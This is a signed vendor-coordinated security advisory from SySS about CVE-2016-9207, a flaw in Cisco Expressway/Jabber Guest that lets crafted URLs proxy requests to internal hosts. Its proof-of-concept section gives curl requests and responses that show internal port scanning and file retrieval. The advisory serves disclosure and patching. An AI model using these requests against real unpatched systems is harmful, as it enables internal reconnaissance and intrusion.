-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2016-115
Product: Expressway
Manufacturer: Cisco
Affected Version(s): below X8.9
Tested Version(s): X8.8.1
Vulnerability Type: Improper Input Validation (CWE-20)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2016-11-10
Solution Date: 2016-12-05
Public Disclosure: 2016-12-14
CVE Reference: CVE-2016-9207
Author of Advisory: Micha Borrmann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Jabber Guest [1] can be used to connect people from the Internet with
enterprise workers using video calls within a web browser.

Due to improper input validation, it is possible by using specially
crafted URLs to perform port scans from the used video communication
server (VCS) [2] of any system which can be reached by it, usually
internal servers. It is also possible to perform denial-of-service
attacks against the VCS by downloading large files.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A part of the URL is a host name (usually the internal Jabber Guest
server) which will be connected from the EXP-C [3] which acts like a
web proxy, if /jabberc/rest/calls/ is appended to the first "directory".
With a colon (:), it is also possible to specify a target TCP port.
Therefore, anybody, for example an external attacker, can abuse the web-based 
application to connect to target systems. If the system is a web
server, it also possible to download files from it. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

This HTTP GET requests connects to the SSH server on localhost:

$ curl --include https://jabberguest.company.com/127.0.0.1:22/jabberc/rest/calls/index.txt
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:14:20 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.6 PKIX
Protocol mismatch.

It can be confirmed, that no SMTP service is running on localhost (very simple port scan):

$ curl --include https://jabberguest.company.com/127.0.0.1:25/jabberc/rest/calls/index.txt
HTTP/1.1 502 Connection refused
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:22:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 253
Connection: keep-alive
Cache-Control: no-store
Content-Language: en
Age: 0

<HTML>
<HEAD>
<TITLE>Could Not Connect</TITLE>
</HEAD>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Could Not Connect</H1>
<HR>

<FONT FACE="Helvetica,Arial"><B>
Description: Could not connect to the server "<EM>127.0.0.1</EM>".
</B></FONT>
<HR>
</BODY>

Connections to other servers are possible, too:

$ curl --include https://jabberguest.company.com/172.27.14.74:22/jabberc/rest/calls/index.txt
HTTP/1.1 200 Connection Established
Server: nginx/1.6.2
Date: Fri, 11 Nov 2016 12:13:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Age: 0

SSH-2.0-OpenSSH_6.2_hpn13v11 FreeBSD-20130515
Protocol mismatch.

If a web server contains files within the directory structure
/jabberc/rest/calls/, they can be downloaded via the Jabber Guest via
EXP-E via EXP-C. For demonstration purposes, there was a simple text
file placed at such directory (on a Microsoft Server system which can
also be identified):

$ curl --include https://jabberguest.company.com/172.27.14.12/jabberc/rest/calls/index.txt 
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2016 12:21:08 GMT
Accept-Ranges: bytes
ETag: "78c1c7984c30d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 10 Nov 2016 09:28:15 GMT
Content-Length: 7
Age: 0
Connection: keep-alive

hallo

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to software version 8.9

More Information:
https://software.cisco.com/download/release.html?mdfid=286255326&flowid=77866&softwareid=280886992&release=X8.9&relind=AVAILABLE&rellifecycle=&reltype=latest

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-10-27: Vulnerability discovered
2016-11-10: Vulnerability reported to manufacturer
2016-12-05: Patch released by manufacturer
2016-12-07: Public disclosure of vulnerability by manufacturer [4]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Jabber Guest
    http://www.cisco.com/c/en/us/products/unified-communications/jabber-guest/index.html
[2] Product website for Video Communication Server (VCS)
    http://www.cisco.com/c/en/us/products/unified-communications/telepresence-video-communication-server-vcs/index.html
[3] Product website for Expressway
    http://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html
[4] Cisco Security Advisory: Cisco Expressway Series Software Security Bypass Vulnerability
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161207-expressway
[5] SySS Security Advisory SYSS-2016-115
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-115.txt
[6] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key ID: 0xEDBE26E714EA58760
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6  0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlhRQsIACgkQ7b4m5xTq
WHbgng//Xk5ZUqAtc7U47JlqoOzAd/luGgRQF3UXPVCjyFncRi13HuQjd7vZccyw
8SlwCpACHeLSnB6vcCqkG2FVIbmnQWyWjF1ZFQsvLNbAZGHc+IfG9wGm1W10oL1r
+GLvjA/edwG+L0ifga0Mpw051N1/22/mAz77ISyuJ89x5pjzGD583WKdlCF7E/Z9
yZpMILpTfLH1+pIsCHYNtnUhToQbUAquPrXxp4iQxM5mK16/0Aa+lNLHYKCA0zz0
idnBKbepYTpB562hoJERegMfVfMmrIZteyrOVPHILJOwOoCkLIZCSx9gBG7cnImz
Pwe9XAzvA/oJZIrbOozi+0L4ANdhAWVcXpj6YCvRObJ56iXT4sK733iuIaGyB5Ur
vTUGCI5+ASi8hKmJdX0n2mGj57UjOskahH3BACIgxM6X4AfPfAxCFstBBRdx0w8Z
jd3/RqvH0hfVuwPowClaGjwvuEFGGTMFo8sd0JaYLiqnTustvHNMJlfmjXJ2paXy
bDHQ1aIdxyAqsCNjTL+jyE+jhM5kHLGLFUmtR8DWpBoNfM73BwxAHmLb0ypTWLQv
yqS9n1E24VJjkcv6r0i6qY0grU6RddUKXoC5gDlcvY/kQhnNHHqBHJC8veIRcMj4
U3E6NkU+Q6iCATkBqWxSPKkvmtdbYmo0M85djq3yxEUUthVFQWw=
=LH5U
-----END PGP SIGNATURE-----